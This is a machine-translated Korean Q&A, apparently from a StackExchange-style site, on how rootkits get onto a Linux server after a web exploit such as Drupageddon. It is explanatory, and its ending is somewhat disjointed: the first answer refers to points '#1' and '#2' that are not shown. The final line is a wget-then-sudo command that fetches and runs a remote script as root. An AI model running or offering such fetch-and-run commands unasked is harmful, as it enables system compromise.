루트킷 검사에 대한 몇 가지 게시물을 보았지만 Linux 시스템에 어떻게 접근하는지에 대한 정보를 찾지 못했습니다. 특히 PHP 웹 사이트에서 버그를 악용하는 경우 ( 여기에서 drupageddon 에 대해 이야기하고 있습니다) 루트가 아닌 웹 서버 (www-data)로만 실행할 수 있지만 루트킷을 설치할 수 있습니다. 이것들이 어떻게 설치되는지에 관해 내가 찾은 아주 작은 정보는 그것들을 설치하기 위해 루트가되어야한다는 것을 암시합니다 ( 여기 참조 ).
답변:
그것이 나라면 나는 다음 방법을 설득 할 것입니다 :
# 1과 관련하여 : 사용자는 Linux를 사용할 때 임의의 소프트웨어를 다운로드해서는 안됩니다. 적절한 채널 (Ubuntu Software Center)을 사용하여 소프트웨어를 설치하십시오. 해당 채널 외부에서 다운로드해야하는 소프트웨어 인 경우 다운로드 소스를 신뢰할 수 있는지 확인하십시오. 최신 버전의 Apache 소프트웨어 또는 MySQL을 생각하십시오. 해당 응용 프로그램의 무결성에 대해 다른 소셜 미디어를 확인하지 않고 임의의 소프트웨어를 다운로드하지 마십시오. Microsoft는 소프트웨어를 중앙 집중화하지 않았습니다. 많은 사람들이 소프트웨어를 사용하여 사용자 기반이 허물어지면서 컴퓨터에 쉽게 들어가 판매 할 수있는 데이터를 수집하기 시작했습니다.
# 2에 관하여 : 치명적인 사용자 결함. 왜 물어 보지 않는 한 관리자 암호를 입력하지 마십시오.
예, 일반적으로 루트킷을 설치하려면 루트 권한이 필요합니다. 많은 루트킷에는 커널에로드되는 모듈이 있으며, 다른 루트킷은 일반적으로 루트에서 사용하는 덮어 쓰기 도구입니다. 올바르게 설정되고 완벽한 시스템에서는 루트 권한없이 루트 키트를 설치할 방법이 없지만 ...
... 시스템 구성에 문제가있어 시스템이 안전하지 않을 수 있습니다. ... 권한 상승을 허용하는 보안 버그가있을 수 있습니다 ... 루트 권한을 가진 사용자를 속여서 악의적 인 것을 실행하는 방법이있을 수 있습니다.
그 방법은 침입자의 상상력만큼이나 무제한입니다.
wget http://mydomain/script.sh;sudo ./script.sh